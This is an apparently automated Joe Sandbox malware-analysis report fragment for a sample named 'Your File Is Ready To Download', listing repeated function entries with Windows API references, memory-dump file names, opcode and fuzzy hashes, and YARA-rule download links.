PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: fac03fcaa0ca78f4ffa0e253e291e45ff1f615a41ff2a7827a6f986a6a2a38f3
Instruction ID: 2e6b548fe90bfb9c8feb9ab482c6d9c1eade020760fccf1f1eb8127702f3bf29
Opcode Fuzzy Hash: fac03fcaa0ca78f4ffa0e253e291e45ff1f615a41ff2a7827a6f986a6a2a38f3
Instruction Fuzzy Hash: 58912731604B4486EB6B8B27A8443DA77A2F78DBD4F544216EB9987BF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003656A, Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 88eb2dc4cfc2a16d3babd051395bf2f9b36b6742ebcc7153ee45e43409ef9ef0
Instruction ID: 3ed907058d03dab00793b2776b2b7592571ada4e4fcafe75cdce311b8a35396c
Opcode Fuzzy Hash: 88eb2dc4cfc2a16d3babd051395bf2f9b36b6742ebcc7153ee45e43409ef9ef0
Instruction Fuzzy Hash: A5911831604B4486EB6B8B27A8443DA77A2F78DBE4F544116EB5947BF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400365EE, Relevance: 9.2, APIs: 6, Instructions: 181windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004D0A0: wcsncpy.LIBCMT ref: 000000014004D100
Part of subcall function 000000014004D0A0: _wcstoi64.LIBCMT ref: 000000014004D143

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64wcsncpy
String ID:
API String ID: 2569467992-0
Opcode ID: 3ec7a8a5c1cbe0e479694a790fe1060143f8e704acf9c8db8edc8fc8f04d4e37
Instruction ID: cb97d4fa5daf515643f86601904c792d8324beec538c3ead7fc879156600c094
Opcode Fuzzy Hash: 3ec7a8a5c1cbe0e479694a790fe1060143f8e704acf9c8db8edc8fc8f04d4e37
Instruction Fuzzy Hash: BC912831604B4486EB6B8B27E8443DA77A2F78DBE4F544116EB5987BF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036498, Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004B920: SendMessageTimeoutW.USER32 ref: 000000014004B99D

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID:
API String ID: 3716859204-0
Opcode ID: 25f9f2c6fb8bcb2731fab0fb27143a604483a4b42e94448f4ee181418d713fb8
Instruction ID: 212b7fdcffbbbabce4c06cbc487792d39146d6f66a77b2c049846a6a929a6177
Opcode Fuzzy Hash: 25f9f2c6fb8bcb2731fab0fb27143a604483a4b42e94448f4ee181418d713fb8
Instruction Fuzzy Hash: 05912831604B4486FB6B8B27A8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003667A, Relevance: 9.2, APIs: 6, Instructions: 179windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: fcc2f4db933c77916a0339be05c4e8acc8a82a376386f8a2c8f1aee58430ed5f
Instruction ID: 3ca0f5983517bc3204b1e9167e7164e5a66cce40ef74d2f4eb646131241d0141
Opcode Fuzzy Hash: fcc2f4db933c77916a0339be05c4e8acc8a82a376386f8a2c8f1aee58430ed5f
Instruction Fuzzy Hash: CA912931604B4086FB6B8B27A8447DA77A2F78DBD4F544216EB5947AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400361D5, Relevance: 9.2, APIs: 6, Instructions: 178windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140049780: GetWindowRect.USER32 ref: 00000001400497BF
Part of subcall function 0000000140049780: MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001400361D0), ref: 00000001400498A3

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$Window$ClipboardCloseGlobalMessageMovePeekRectUnlock
String ID:
API String ID: 1284534901-0
Opcode ID: 8f3203945f67b16894492d78359270ec5bc0eb072de02199c70933a878d424f9
Instruction ID: a626e3aa2ef74490c708d56bcdbf065145f08b7ed763e8ae0d42069ad2b1c799
Opcode Fuzzy Hash: 8f3203945f67b16894492d78359270ec5bc0eb072de02199c70933a878d424f9
Instruction Fuzzy Hash: B0914A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB9947AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400363F6, Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004AC40: GetWindowRect.USER32 ref: 000000014004ACE6
Part of subcall function 000000014004AC40: GetWindowRect.USER32 ref: 000000014004ACF4

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$RectWindow$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 3440613390-0
Opcode ID: f69b7ca4177a38f853b256c9bb8f42d2eb73f6d2868821b94ce263e8d9d206de
Instruction ID: f4dc59ab47249a61f87e17bd69f098905967f2c83d8a92a9e2ae220de7726b8e
Opcode Fuzzy Hash: f69b7ca4177a38f853b256c9bb8f42d2eb73f6d2868821b94ce263e8d9d206de
Instruction Fuzzy Hash: 5D913931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003645E, Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004B550: GetWindowThreadProcessId.USER32 ref: 000000014004B5B4
Part of subcall function 000000014004B550: AttachThreadInput.USER32 ref: 000000014004B5E4
Part of subcall function 000000014004B550: SetFocus.USER32 ref: 000000014004B5F3
Part of subcall function 000000014004B550: AttachThreadInput.USER32 ref: 000000014004B8B4

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountThreadTick$AttachInput$ClipboardCloseFocusGlobalMessagePeekProcessUnlockWindow
String ID:
API String ID: 1514730375-0
Opcode ID: cd15843e91281e5b9ee908c88a28e981e8a85fef4de83cc26e6aef36d53b437e
Instruction ID: e9aece100f976da43861e7f221417fdd1ed22c36aca12058b6b43f9555e958d0
Opcode Fuzzy Hash: cd15843e91281e5b9ee908c88a28e981e8a85fef4de83cc26e6aef36d53b437e
Instruction Fuzzy Hash: 0A913931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400364DE, Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004BCC0: SendMessageTimeoutW.USER32 ref: 000000014004BD3E

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendTimeoutUnlock
String ID:
API String ID: 3716859204-0
Opcode ID: 9045afa7ff68d6d758fd7465decd8510b9363853d00760fc77734a0c668cf471
Instruction ID: 90040355ca43226aa88c25f2e90826af395ffe36de7bedea7324ca478848b6b6
Opcode Fuzzy Hash: 9045afa7ff68d6d758fd7465decd8510b9363853d00760fc77734a0c668cf471
Instruction Fuzzy Hash: 56913A31604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5947AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036787, Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: e48d691b1342555744af5c1e82203bdc9ca2f5adec985c39c4e3245653571291
Instruction ID: e242d355cfb9f1bf84a6fc2390798b912668a41450761d4aaf6386c57a157e2a
Opcode Fuzzy Hash: e48d691b1342555744af5c1e82203bdc9ca2f5adec985c39c4e3245653571291
Instruction Fuzzy Hash: 00913A31604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400368C7, Relevance: 9.2, APIs: 6, Instructions: 177windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 41cbceee6e497315b44e420d026ba5fe02903a4227a6bee7abe67a313910d660
Instruction ID: e4cbfc9a37aff8be915b1068244a94b13da4b2b7e70e3dd545c8b7ae85bec3c2
Opcode Fuzzy Hash: 41cbceee6e497315b44e420d026ba5fe02903a4227a6bee7abe67a313910d660
Instruction Fuzzy Hash: 7E914B71604B408AFB6B8B27E8443EA77A2F78DBD4F544116EB59876F5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038184, Relevance: 9.2, APIs: 6, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A8260: GetFullPathNameW.KERNEL32(?,00000001400381AF), ref: 00000001400A8296
Part of subcall function 00000001400A8260: WritePrivateProfileStringW.KERNEL32 ref: 00000001400A82AA
Part of subcall function 00000001400A8260: WritePrivateProfileStringW.KERNEL32 ref: 00000001400A82BE

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$PrivateProfileStringWrite$ClipboardCloseFullGlobalMessageNamePathPeekUnlock
String ID:
API String ID: 2214806735-0
Opcode ID: 03fda0708ac66dd2f581c8ee575d45d5af6eab0f5c841344617907c826e0f3f0
Instruction ID: 3f504f6883fe98daf7a7a4ec8062de8263fd6359253ad18194368dcac8536ffe
Opcode Fuzzy Hash: 03fda0708ac66dd2f581c8ee575d45d5af6eab0f5c841344617907c826e0f3f0
Instruction Fuzzy Hash: 01914A31604B408AFB6B8B27A8447EA77A2F78DBD4F544216FB59876F5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038469, Relevance: 9.2, APIs: 6, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400810B0: GetCurrentProcess.KERNEL32 ref: 00000001400810B8
Part of subcall function 00000001400810B0: OpenProcessToken.ADVAPI32 ref: 00000001400810CB

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$Process$ClipboardCloseCurrentGlobalMessageOpenPeekTokenUnlock
String ID:
API String ID: 3060718303-0
Opcode ID: 2bdd698e07211fd36147eb6777536f31da52d788477a4c58660fcafbe0037e1e
Instruction ID: aa19f8e13fbaed35544cf7ebf871bea5fff6feb212f2dfb55b62a6c9fd360419
Opcode Fuzzy Hash: 2bdd698e07211fd36147eb6777536f31da52d788477a4c58660fcafbe0037e1e
Instruction Fuzzy Hash: 6B814C31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5947AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400366C6, Relevance: 9.2, APIs: 6, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004EC90: SetWindowTextW.USER32 ref: 000000014004ECB4

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekTextUnlockWindow
String ID:
API String ID: 189804293-0
Opcode ID: a103bc6f932fd7d2426b29f5c2a861b4c49de0de3ef49d6074f775e11d55a71d
Instruction ID: 63921aedb99911b84aa12d93bc99502e92ea3285baf7d73132177b5d4cb4d76d
Opcode Fuzzy Hash: a103bc6f932fd7d2426b29f5c2a861b4c49de0de3ef49d6074f775e11d55a71d
Instruction Fuzzy Hash: 22913B71604B4086FB6B8B27E8443EA77A2F78DBD4F544116EB59876F5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036F23, Relevance: 9.2, APIs: 6, Instructions: 176windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 49dd499240f719c284199b7ab0f31225a89f4abf5ee20a87ad63996d7ed51c41
Instruction ID: 62b73bed3c5c3c43dd99c906a306d2e30aa9e6e4cfff39331c5acd201ac973f8
Opcode Fuzzy Hash: 49dd499240f719c284199b7ab0f31225a89f4abf5ee20a87ad63996d7ed51c41
Instruction Fuzzy Hash: CE914B31604B4086FB6B8B27A8443EA77A2F78DBE4F544216FB59876F5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037064, Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

